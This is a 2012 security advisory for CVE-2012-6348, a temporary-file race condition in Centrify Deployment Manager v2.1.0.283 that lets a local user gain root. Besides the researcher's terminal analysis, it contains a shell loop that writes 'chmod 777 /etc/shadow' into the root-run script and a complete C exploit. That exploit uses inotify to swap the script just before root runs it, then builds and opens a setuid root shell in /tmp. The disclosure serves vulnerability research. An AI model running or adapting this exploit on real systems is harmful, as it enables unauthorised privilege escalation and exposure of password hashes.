Advisory #: 29
Title: Centrify Deployment Manager v2.1.0.283 local root
Author: Larry W. Cashdollar, @_larry0
Date: 2012-12-07
CVE-ID:[CVE-2012-6348]
CWE: CWE-59 Link Following
Download Site: http://www.centrify.com/products/centrify-server-suite.asp
Vendor: Centrify
Vendor Notified: 2012-12-07
Vendor Contact: info@centrify.com
Advisory: http://www.vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html
Description: Centrify Server Suite secures the industry's broadest range of mission-critical servers from identity-related insider risks and outsider attacks, making security and regulatory compliance repeatable and sustainable. The solution leverages existing Active Directory infrastructure to centrally manage authentication, access controls, privileged identities, policy enforcement and compliance for on-premises and cloud resources.
Vulnerability:
Taking a little longer look at the software, I managed to win a race condition and get root with files in /tmp. Here is my analysis: root@h0g:/tmp ls -l /etc/shadow -r-------- 1 root shadow 1010 Dec 7 21:42 /etc/shadow root@h0g:/tmp larry@h0g:/tmp$ ln -s /etc/shadow centrify.cmd.0 larry@h0g:/tmp$ ls -l total 24 lrwxrwxrwx 1 larry larry 11 Dec 7 21:48 centrify.cmd.0 -> /etc/shadow After Analyze/Refresh Computer Information is run : root@h0g:/tmp ls -l /etc/shadow -rwxr-xr-x 1 root shadow 165 Dec 7 21:48 /etc/shadow root@h0g:/tmp cat /etc/shadow echo 144d823c-9c22-4d21-8446-4e2d07556177 vmware -v 2> /dev/null |grep 'VMware ESX Server' >/dev/null temp=$? echo af43ab93-cfce-485e-b16f-0d4331e0e421 exit ${temp} root@h0g:/tmp ls -l /etc/shadow -rwxr-xr-x 1 root shadow 165 Dec 7 21:48 /etc/shadow root@h0g:/tmp This sucks we clobber the contents of /etc/shadow and we don't have write permission. No root still. Looking at the history and trace of what was run on the target system we see this: Execute echo "echo 8c8ac888-342b-461f-a0ab-659251f3d602" > /tmp/centrify.cmd.0 Result =0 <----- if we create the file before them, we own it. We can write to it before it's executed and have our command executed. Execute echo "vmware -v 2> /dev/null |grep 'VMware ESX Server' >/dev/null" >> /tmp/centrify.cmd.0 Result =0 Execute echo "temp=\$?" >> /tmp/centrify.cmd.0 Result =0 Execute echo "echo b2449bef-65c1-45e8-9da0-4801200c5c05" >> /tmp/centrify.cmd.0 Result =0 Execute echo "exit \${temp}" >> /tmp/centrify.cmd.0 Result =0 Execute chmod 755 /tmp/centrify.cmd.0 Result =0 Execute dzdo -p "Password:" sh -c "/tmp/centrify.cmd.0" Result =0 <--- dzdo is centrify's sudo equivalent, it's part of the centrify suite. 8c8ac888-342b-461f-a0ab-659251f3d602 b2449bef-65c1-45e8-9da0-4801200c5c05 Execute rm -rf /tmp/centrify.cmd.0 Result =0 Execute id -u Result =0
Export: JSON TEXT XML
Exploit Code:
  1. So our quick dirty exploit:
  2.  
  3. larry@h0g:/tmp$ while (true) ; do echo "chmod 777 /etc/shadow" >> /tmp/centrify.cmd.0 ; done
  4.  
  5. Will get us our command executed:
  6.  
  7. larry@h0g:/tmp$ ls -l /etc/shadow
  8. -rwxrwxrwx 1 root shadow 1010 Dec 7 21:57 /etc/shadow larry@h0g:/tmp$
  9.  
  10. It might work creating the file centrify.cmd.UID, then monitoring it for having the execute bit set with inotify (IN_ATTRIB). When the execute bit is set write our malicious command to the file as it about to be executed by root.
  11.  
  12. /*Local root exploit for Centrify Deployment Manager v2.1.0.283 local root,
  13. Centrify released a fix very quickly - nice vendor response.
  14.  
  15. http://vapid.dhs.org/exploits/centrify_local_r00t.c
  16.  
  17. CVE-2012-6348 12/17/2012
  18. http://vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp2.html
  19. Greetings vladz, Thanks for the inotify & syscall technique.
  20.  
  21. This exploit based on http://vladz.devzero.fr/010_bzexe-vuln.php
  22.  
  23. Run the exploit and wait for administrator to analyse or deploysoftware
  24. to the system.
  25.  
  26. larry@h0g:~/code/exploit$ ./cent_root centrify.cmd.0
  27. [*] Launching attack against "centrify.cmd.0"
  28. [+] Creating evil script (/tmp/evil)
  29. [+] Creating target file (/bin/touch /tmp/centrify.cmd.0)
  30. [+] Initialize inotify
  31. [+] Waiting for root to launch "centrify.cmd.0"
  32. [+] Opening root shell (/tmp/sh)
  33. #
  34.  
  35. Larry W. Cashdollar
  36. @_larry0
  37. */
  38.  
  39.  
  40. #include <stdlib.h>
  41. #include <stdio.h>
  42. #include <unistd.h>
  43. #include <sys/stat.h>
  44. #include <sys/types.h>
  45. #include <string.h>
  46. #include <sys/inotify.h>
  47. #include <fcntl.h>
  48. #include <sys/syscall.h>
  49.  
  50. /*Create a small c program to pop us a root shell*/
  51. int create_nasty_shell(char *file) {
  52. char *s = "#!/bin/bash\n"
  53. "echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'>/tmp/sh.c\n"
  54. "cc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"
  55. "chmod 4755 /tmp/sh;\n";
  56.  
  57. int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO);
  58. write(fd, s, strlen(s));
  59. close(fd);
  60.  
  61. return 0;
  62. }
  63.  
  64.  
  65. int main(int argc, char **argv) {
  66. int fd, wd;
  67. char buf[1], *targetpath, *cmd,
  68. *evilsh = "/tmp/evil", *trash = "/tmp/trash";
  69.  
  70. if (argc < 2) {
  71. printf("Usage: %s <target file> \n", argv[0]);
  72. return 1;
  73. }
  74.  
  75. printf("[*] Launching attack against \"%s\"\n", argv[1]);
  76.  
  77. printf("[+] Creating evil script (/tmp/evil)\n");
  78. create_nasty_shell(evilsh);
  79.  
  80. targetpath = malloc(sizeof(argv[1]) + 6);
  81. cmd = malloc(sizeof(char) * 32);
  82. sprintf(targetpath, "/tmp/%s", argv[1]);
  83. sprintf(cmd,"/bin/touch %s",targetpath);
  84. printf("[+] Creating target file (%s)\n",cmd);
  85. system(cmd);
  86.  
  87. printf("[+] Initialize inotify\n");
  88. fd = inotify_init();
  89. wd = inotify_add_watch(fd, targetpath, IN_ATTRIB);
  90.  
  91. printf("[+] Waiting for root to change perms on \"%s\"\n", argv[1]);
  92. syscall(SYS_read, fd, buf, 1);
  93. syscall(SYS_rename, targetpath, trash);
  94. syscall(SYS_rename, evilsh, targetpath);
  95.  
  96. inotify_rm_watch(fd, wd);
  97.  
  98. printf("[+] Opening root shell (/tmp/sh)\n");
  99. sleep(2);
  100. system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\"");
  101.  
  102. return 0;
  103. }
Screen Shots:
Notes:
88343